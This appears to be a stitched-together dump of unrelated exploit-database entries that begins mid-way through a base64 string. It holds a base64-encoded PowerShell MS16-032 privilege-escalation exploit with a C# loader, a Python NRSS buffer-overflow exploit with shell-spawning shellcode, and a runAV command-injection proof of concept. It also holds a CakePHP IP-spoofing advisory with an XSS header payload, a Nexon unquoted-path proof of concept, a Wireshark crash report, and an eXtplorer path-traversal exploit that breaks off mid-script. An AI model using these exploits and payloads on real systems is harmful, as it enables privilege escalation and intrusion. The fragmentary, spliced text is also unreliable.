QoJCQ0KCQllY2hvICJbPl0gQnVpbGRpbmcgU1lTVEVNIGltcGVyc29uYXRpb24gdG9rZW4iDQoJCSMgU2VjdXJpdHlRdWFsaXR5T2ZTZXJ2aWNlIHN0cnVjdA0KCQkkU1FPUyA9IE5ldy1PYmplY3QgU1FPUw0KCQkkU1FPUy5JbXBlcnNvbmF0aW9uTGV2ZWwgPSAyICNTZWN1cml0eUltcGVyc29uYXRpb24NCgkJJFNRT1MuTGVuZ3RoID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2l6ZU9mKCRTUU9TKQ0KCQkjIFVuZG9jdW1lbnRlZCBBUEkncywgSSBsaWtlIHlvdXIgc3R5bGUgTWljcm9zb2Z0IDspDQoJCSRDYWxsUmVzdWx0ID0gW050ZGxsXTo6TnRJbXBlcnNvbmF0ZVRocmVhZCgkVGhyZWFkLCAkVGhyZWFkLCBbcmVmXSRzcW9zKQ0KCQlpZiAoJENhbGxSZXN1bHQgLW5lIDApIHsNCgkJCWVjaG8gIlshXSBOdEltcGVyc29uYXRlVGhyZWFkIGZhaWxlZCwgbW92aW5nIG9uLi4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkVGhyZWFkKQ0KCQkJZWNobyAiWytdIFRocmVhZCByZXN1bWVkISINCgkJCVJldHVybg0KCQl9DQoJDQoJCSRzY3JpcHQ6U3lzVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybw0KCQkjIDB4MDAwNiAtLT4gVE9LRU5fRFVQTElDQVRFIC1ib3IgVE9LRU5fSU1QRVJTT05BVEUNCgkJJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpPcGVuVGhyZWFkVG9rZW4oJFRocmVhZCwgMHgwMDA2LCAkZmFsc2UsIFtyZWZdJFN5c1Rva2VuSGFuZGxlKQ0KCQlpZiAoISRDYWxsUmVzdWx0KSB7DQoJCQllY2hvICJbIV0gT3BlblRocmVhZFRva2VuIGZhaWxlZCwgbW92aW5nIG9uLi4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkVGhyZWFkKQ0KCQkJZWNobyAiWytdIFRocmVhZCByZXN1bWVkISINCgkJCVJldHVybg0KCQl9DQoJCQ0KCQllY2hvICJbP10gU3VjY2Vzcywgb3BlbiBTWVNURU0gdG9rZW4gaGFuZGxlOiAkU3lzVG9rZW5IYW5kbGUiDQoJCWVjaG8gIlsrXSBSZXN1bWluZyB0aHJlYWQuLiINCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkNCgl9DQoJDQoJIyBtYWluKCkgPC0tLSA7KQ0KCSRtczE2MDMyID0gQCINCgkgX18gX18gX19fIF9fXyAgIF9fXyAgICAgX19fIF9fXyBfX18gDQoJfCAgViAgfCAgX3xfICB8IHwgIF98X19ffCAgIHxfICB8XyAgfA0KCXwgICAgIHxfICB8X3wgfF98IC4gfF9fX3wgfCB8XyAgfCAgX3wNCgl8X3xffF98X19ffF9fX19ffF9fX3wgICB8X19ffF9fX3xfX198DQoJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQoJICAgICAgICAgICAgICAgW2J5IGIzM2YgLT4gQEZ1enp5U2VjXQ0KIkANCgkNCgkkbXMxNjAzMg0KCQ0KCSMgQ2hlY2sgbG9naWNhbCBwcm9jZXNzb3IgY291bnQsIHJhY2UgY29uZGl0aW9uIHJlcXVpcmVzIDIrDQoJZWNobyAiYG5bP10gT3BlcmF0aW5nIHN5c3RlbSBjb3JlIGNvdW50OiAkKFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpQcm9jZXNzb3JDb3VudCkiDQoJaWYgKCQoW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50KSAtbHQgMikgew0KCQllY2hvICJbIV0gVGhpcyBpcyBhIFZNIGlzbid0IGl0LCByYWNlIGNvbmRpdGlvbiByZXF1aXJlcyBhdCBsZWFzdCAyIENQVSBjb3JlcywgZXhpdGluZyFgbiINCgkJUmV0dXJuDQoJfQ0KCQ0KCSMgQ3JlYXRlIGFycmF5IGZvciBUaHJlYWRzICYgVElEJ3MNCgkkVGhyZWFkQXJyYXkgPSBAKCkNCgkkVGlkQXJyYXkgPSBAKCkNCgkNCgllY2hvICJbPl0gRHVwbGljYXRpbmcgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgaGFuZGxlcy4uIg0KCSMgTG9vcCBHZXQtVGhyZWFkSGFuZGxlIGFuZCBjb2xsZWN0IHRocmVhZCBoYW5kbGVzIHdpdGggYSB2YWxpZCBUSUQNCglmb3IgKCRpPTA7ICRpIC1sdCA1MDA7ICRpKyspIHsNCgkJJGhUaHJlYWQgPSBHZXQtVGhyZWFkSGFuZGxlDQoJCSRoVGhyZWFkSUQgPSBbS2VybmVsMzJdOjpHZXRUaHJlYWRJZCgkaFRocmVhZCkNCgkJIyBCaXQgaGFja3kvbGF6eSwgZmlsdGVycyBvbiB1bmlxL3ZhbGlkIFRJRCdzIHRvIGNyZWF0ZSAkVGhyZWFkQXJyYXkNCgkJaWYgKCRUaWRBcnJheSAtbm90Y29udGFpbnMgJGhUaHJlYWRJRCkgew0KCQkJJFRpZEFycmF5ICs9ICRoVGhyZWFkSUQNCgkJCWlmICgkaFRocmVhZCAtbmUgMCkgew0KCQkJCSRUaHJlYWRBcnJheSArPSAkaFRocmVhZCAjIFRoaXMgaXMgd2hhdCB3ZSBuZWVkIQ0KCQkJfQ0KCQl9DQoJfQ0KCQ0KCWlmICgkKCRUaHJlYWRBcnJheS5sZW5ndGgpIC1lcSAwKSB7DQoJCWVjaG8gIlshXSBObyB2YWxpZCB0aHJlYWQgaGFuZGxlcyB3ZXJlIGNhcHR1cmVkLCBleGl0aW5nISINCgkJUmV0dXJuDQoJfSBlbHNlIHsNCgkJZWNobyAiWz9dIERvbmUsIGdvdCAkKCRUaHJlYWRBcnJheS5sZW5ndGgpIHRocmVhZCBoYW5kbGUocykhIg0KCQllY2hvICJgbls/XSBUaHJlYWQgaGFuZGxlIGxpc3Q6Ig0KCQkkVGhyZWFkQXJyYXkNCgl9DQoJDQoJZWNobyAiYG5bKl0gU25pZmZpbmcgb3V0IHByaXZpbGVnZWQgaW1wZXJzb25hdGlvbiB0b2tlbi4uIg0KCWZvcmVhY2ggKCRUaHJlYWQgaW4gJFRocmVhZEFycmF5KXsNCgkNCgkJIyBHZXQgaGFuZGxlIHRvIFNZU1RFTSBhY2Nlc3MgdG9rZW4NCgkJR2V0LVN5c3RlbVRva2VuDQoJCQ0KCQllY2hvICJgblsqXSBTbmlmZmluZyBvdXQgU1lTVEVNIHNoZWxsLi4iDQoJCWVjaG8gImBuWz5dIER1cGxpY2F0aW5nIFNZU1RFTSB0b2tlbiINCgkJJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvDQoJCSRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6RHVwbGljYXRlVG9rZW4oJFN5c1Rva2VuSGFuZGxlLCAyLCBbcmVmXSRoRHVwbGljYXRlVG9rZW5IYW5kbGUpDQoJCQ0KCQkjIFNpbXBsZSBQUyBydW5zcGFjZSBkZWZpbml0aW9uDQoJCWVjaG8gIls+XSBTdGFydGluZyB0b2tlbiByYWNlIg0KCQkkUnVuc3BhY2UgPSBbcnVuc3BhY2VmYWN0b3J5XTo6Q3JlYXRlUnVuc3BhY2UoKQ0KCQkkU3RhcnRUb2tlblJhY2UgPSBbcG93ZXJzaGVsbF06OkNyZWF0ZSgpDQoJCSRTdGFydFRva2VuUmFjZS5ydW5zcGFjZSA9ICRSdW5zcGFjZQ0KCQkkUnVuc3BhY2UuT3BlbigpDQoJCVt2b2lkXSRTdGFydFRva2VuUmFjZS5BZGRTY3JpcHQoew0KCQkJUGFyYW0gKCRUaHJlYWQsICRoRHVwbGljYXRlVG9rZW5IYW5kbGUpDQoJCQl3aGlsZSAoJHRydWUpIHsNCgkJCQkkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkNCgkJCX0NCgkJfSkuQWRkQXJndW1lbnQoJFRocmVhZCkuQWRkQXJndW1lbnQoJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkNCgkJJEFzY09iaiA9ICRTdGFydFRva2VuUmFjZS5CZWdpbkludm9rZSgpDQoJCQ0KCQllY2hvICJbPl0gU3RhcnRpbmcgcHJvY2VzcyByYWNlIg0KCQkjIEFkZGluZyBhIHRpbWVvdXQgKDEwIHNlY29uZHMpIGhlcmUgdG8gc2FmZWd1YXJkIGZyb20gZWRnZS1jYXNlcw0KCQkkU2FmZUd1YXJkID0gW2RpYWdub3N0aWNzLnN0b3B3YXRjaF06OlN0YXJ0TmV3KCkNCgkJd2hpbGUgKCRTYWZlR3VhcmQuRWxhcHNlZE1pbGxpc2Vjb25kcyAtbHQgMTAwMDApIHsNCgkJIyBTdGFydHVwSW5mbyBTdHJ1Y3QNCgkJJFN0YXJ0dXBJbmZvID0gTmV3LU9iamVjdCBTVEFSVFVQSU5GTw0KCQkkU3RhcnR1cEluZm8uY2IgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpTaXplT2YoJFN0YXJ0dXBJbmZvKSAjIFN0cnVjdCBTaXplDQoJCQ0KCQkjIFByb2Nlc3NJbmZvIFN0cnVjdA0KCQkkUHJvY2Vzc0luZm8gPSBOZXctT2JqZWN0IFBST0NFU1NfSU5GT1JNQVRJT04NCgkJDQoJCSMgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgLS0+IGxwQ3VycmVudERpcmVjdG9yeQ0KCQkkR2V0Q3VycmVudFBhdGggPSAoR2V0LUl0ZW0gLVBhdGggIi5cIiAtVmVyYm9zZSkuRnVsbE5hbWUNCgkJDQoJCSMgTE9HT05fTkVUQ1JFREVOVElBTFNfT05MWSAvIENSRUFURV9TVVNQRU5ERUQNCgkJJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpDcmVhdGVQcm9jZXNzV2l0aExvZ29uVygNCgkJCSJ1c2VyIiwgImRvbWFpbiIsICJwYXNzIiwNCgkJCTB4MDAwMDAwMDIsICJDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUiLCAiIiwNCgkJCTB4MDAwMDAwMDQsICRudWxsLCAkR2V0Q3VycmVudFBhdGgsDQoJCQlbcmVmXSRTdGFydHVwSW5mbywgW3JlZl0kUHJvY2Vzc0luZm8pDQoJCQkNCgkJJGhUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvDQoJCSRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblByb2Nlc3NUb2tlbigkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4MjgsIFtyZWZdJGhUb2tlbkhhbmRsZSkNCgkJIyBJZiB3ZSBjYW4ndCBvcGVuIHRoZSBwcm9jZXNzIHRva2VuIGl0J3MgYSBTWVNURU0gc2hlbGwhDQoJCWlmICghJENhbGxSZXN1bHQpIHsNCgkJCWVjaG8gIlshXSBIb2x5IGhhbmRsZSBsZWFrIEJhdG1hbiwgd2UgaGF2ZSBhIFNZU1RFTSBzaGVsbCEhYG4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkUHJvY2Vzc0luZm8uaFRocmVhZCkNCgkJCSRTdGFydFRva2VuUmFjZS5TdG9wKCkNCgkJCSRTYWZlR3VhcmQuU3RvcCgpDQoJCQlSZXR1cm4NCgkJfQ0KCQkJDQoJCSMgQ2xlYW4gdXAgc3VzcGVuZGVkIHByb2Nlc3MNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpUZXJtaW5hdGVQcm9jZXNzKCRQcm9jZXNzSW5mby5oUHJvY2VzcywgMSkNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpDQoJCSRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6Q2xvc2VIYW5kbGUoJFByb2Nlc3NJbmZvLmhUaHJlYWQpDQoJCX0NCgkJDQoJCSMgS2lsbCBydW5zcGFjZSAmIHN0b3B3YXRjaCBpZiBlZGdlLWNhc2UNCgkJJFN0YXJ0VG9rZW5SYWNlLlN0b3AoKQ0KCQkkU2FmZUd1YXJkLlN0b3AoKQ0KCX0NCn0="));
public void ExecuteSynchronously()
{
InitialSessionState iss = InitialSessionState.CreateDefault();
Runspace rs = RunspaceFactory.CreateRunspace(iss);
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(PSInvoke_MS16_032);
ps.AddScript("Invoke-MS16-032");
ps.AddCommand("Out-Default");
ps.Invoke();
rs.Close();
}
}
}
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: NRSS RSS Reader
# Version: 0.3.9-1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: NRSS is a console based RSS reader allowing
# uses to read and manage RSS feeds
# Kali Linux 2.0 package: pool/main/n/nrss/nrss_0.3.9-1_i386.deb
# MD5sum: 27d997c89340ebb6f4a1d9e1eb28ea39
# Website: http://www.codezen.org/nrss/
#
# gdb$ run -F $(python -c 'print "A"*256+"DCBA"')
# Starting program: /usr/bin/nrss -F $(python -c 'print "A"*256+"DCBA"')
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
# Cannot access memory at address 0x41424344
# 0x41424344 in ?? ()
import os, subprocess
def run():
try:
print "# NRSS News Reader - Stack Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 256
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\xd0\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["nrss -F",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, NRSS Reader - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit NRSS Reader v0.3.9-1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
#include "common.h"
main(int argc, char *argv[])
{
char cmd[MAX_OUTPUT_SIZE];
char output[MAX_OUTPUT_SIZE];
int error;
char *colon;
char *keyword;
if (argc > 1) {
sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
output[0] = '\0';
error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++
The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14
POC:
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
-rw-rw-r-- 1 snort snort 0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0
READ of size 16385 at 0x61b00001335c thread T0
#0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
#1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)
#2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32
#3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21
#4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13
#5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21
#6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9
#7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10
#8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
#12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8
#15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8
#16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3
#17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#18 0x52eebb in process_packet wireshark/tshark.c:3748:5
#19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11
#20 0x51e4bc in main wireshark/tshark.c:2213:13
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
#3 0x5244dd in cf_open wireshark/tshark.c:4215:9
#4 0x51decd in main wireshark/tshark.c:2204:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy
Shadow bytes around the buggy address:
0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8910==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39812.zip
=============================================
- Release date: 12.05.2016
- Discovered by: Dawid Golunski
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability
3.1.11
2.8.1
2.7.10
2.6.12
II. BACKGROUND
-------------------------
- CakePHP Framework
http://cakephp.org/
"CakePHP makes building web applications simpler, faster and require less code.
CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer
and a powerful scaffolding system that makes building both small and complex
systems a breeze. "
III. INTRODUCTION
-------------------------
CakePHP Framework contains a vulnerability that allows to spoof the source IP
address. This can allow to bypass access control lists, or injection of
malicious data which, if treated as sanitized by an unaware CakePHP-based
application, can lead to other vulnerabilities such as SQL injection, XSS,
command injection etc.
IV. DESCRIPTION
-------------------------
Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
allows to obtain the IP address of a client accessing a CakePHP-based
application. The is slightly different in each branch:
CakePHP 2.x:
------[ Cake/Network/CakeRequest.php ]------
public function clientIp($safe = true) {
if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR'));
} else {
if (env('HTTP_CLIENT_IP')) {
$ipaddr = env('HTTP_CLIENT_IP');
} else {
$ipaddr = env('REMOTE_ADDR');
}
}
if (env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
CakePHP 3.x:
------[ cakephp/src/Network/Request.php ]------
/**
* Get the IP the client is using, or says they are using.
*
* @return string The client IP.
*/
public function clientIp()
{
if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR'));
} else {
if ($this->env('HTTP_CLIENT_IP')) {
$ipaddr = $this->env('HTTP_CLIENT_IP');
} else {
$ipaddr = $this->env('REMOTE_ADDR');
}
}
if ($this->env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = $this->env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
Both of the methods contain the same vulnerability. Despite the safe flag
(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they
both use HTTP_CLIENT_IP request header (if it exists) instead of the
REMOTE_ADDR variable set by the web server.
The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
in a HTTP request.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
A) Simple PoC
Download a vulnerable version of CakePHP framework and edit
src/Template/Pages/home.ctp to include the PoC code below
which echoes the visitor's IP using the clientIp() method:
-------[ src/Template/Pages/home.ctp ]--------
<?php
[...]
use Cake\Cache\Cache;
use Cake\Core\Configure;
use Cake\Datasource\ConnectionManager;
use Cake\Error\Debugger;
use Cake\Network\Exception\NotFoundException;
$this->layout = false;
if (!Configure::read('debug')):
throw new NotFoundException();
endif;
$cakeDescription = 'CakePHP: the rapid development php framework';
echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";
[...]
?>
----------------------------------------------
If we send the following request with CLIENT-IP header containing an arbitrary
IP and malicious XSS data:
GET /cake/cake3/ HTTP/1.1
Host: centos
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
Content-Length: 2
the application will give the following response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
PoC
<br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]
[...]
As we can see the clientIp() method returns the fake IP and XSS payload
from CLIENT-IP header.
B) Croogo CMS exploit
An example application vulnerable to this bug is Croogo CMS:
https://croogo.org/
"Croogo is a free, open source, content management system for PHP,
released under The MIT License. It is powered by CakePHP MVC framework.
It was first released on October 07, 2009"
In one of its scripts we can find the isWhitelistedRequest() which
takes care of ACLs:
-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------
/**
* Check wether request is from a whitelisted IP address
*
* @see CakeRequest::addDetector()
* @param $request CakeRequest Request object
* @return boolean True when request is from a whitelisted IP Address
*/
public static function isWhitelistedRequest(CakeRequest $request) {
if (!$request) {
return false;
}
$clientIp = $request->clientIp();
$whitelist = array_map(
'trim',
(array)explode(',', Configure::read('Site.ipWhitelist'))
);
return in_array($clientIp, $whitelist);
}
-------------------------------------------------------------------
As we can see, it uses the affected clientIp() function from CakePHP framework.
VI. BUSINESS IMPACT
-------------------------
This vulnerability could be used to bypass access control lists to get
access to sensitive data, or lead to higher severity vulnerabilities
if untrusted data returned by clientIp() method is treated as safe and used
without appropriate sanitization within SQL queries, system command calls etc.
VII. SYSTEMS AFFECTED
-------------------------
According to the vendor, the following versions of CakePHP framework should be
affected by this issue.
3.1.11
3.2.4
2.8.1
2.7.10
2.6.12
VIII. SOLUTION
-------------------------
The vendor has released patched versions.
Install the latest version from the link below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt
Vendor security CakePHP releases:
http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
12.05.2016 - Final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
-----------------------------------------------------------------------------------------------------------------
# Exploit Title: Multiples Nexon Games - Privilege Escalation Unquoted path vulnerabilities
# Date: 13/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.nexon.net/
# Softwares Links: http://dirtybomb.nexon.net/ (DirtyBomb)
# http://store.steampowered.com/app/273110/ (CSNZ)
# Versions: Dirty Bomb r56825 USA_EU / CSNZ : 0.0.18845.1
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
Description : Multiples Nexon Game, including but not limited to Dirty Bomb
and Counter-Strike Nexon : Zombies, are Prone to unquoted path
vulnerability. They fail to quote correctly the command that call for
BlackXcht.aes, which is a part of the anti-cheat system (Nexon Game
Security). Probably all Nexon games calling this file are affected.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named Program.exe in C:
Launch the game via steam
When BlackXcht.aes is called, Program.exe is executed with same rights as
steam
POC video : https://www.youtube.com/watch?v=wcn62GGwtcQ
Patch :
Patch for Dirty bomb - Upgrade to r57457 USA_EU
-----------------------------------------------------------------------------------------------------------------
/*
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
[+] ISR: apparitionsec
Vendor:
==============
extplorer.net
Product:
==================
eXtplorer v2.1.9
eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
directories, edit, copy, move, delete,
search, upload and download files, create & extract archives, create new
files and directories, change file
permissions (chmod) and more. It is often used as FTP extension for popular
applications like Joomla.
Vulnerability Type:
======================
Archive Path Traversal
CVE Reference:
==============
CVE-2016-4313
Vulnerability Details:
=====================
eXtplorer unzip/extract feature allows for path traversal as decompressed
files can be placed outside of the intended target directory,
if the archive content contains "../" characters. This can result in files
like ".htaccess" being overwritten or RCE / back door
exploits.
Tested on Windows
Reproduction steps:
==================
1) Generate an archive using below PHP script
2) Upload it to eXtplorer and then extract it
3) Check directory for the default 'RCE.php' file or use CL switch to
overwrite files like .htaccess
Exploit code(s):
===============
Run below PHP script from CL...
[evil-archive.php]
*/
<?php
if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default?
Y/[file]>";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
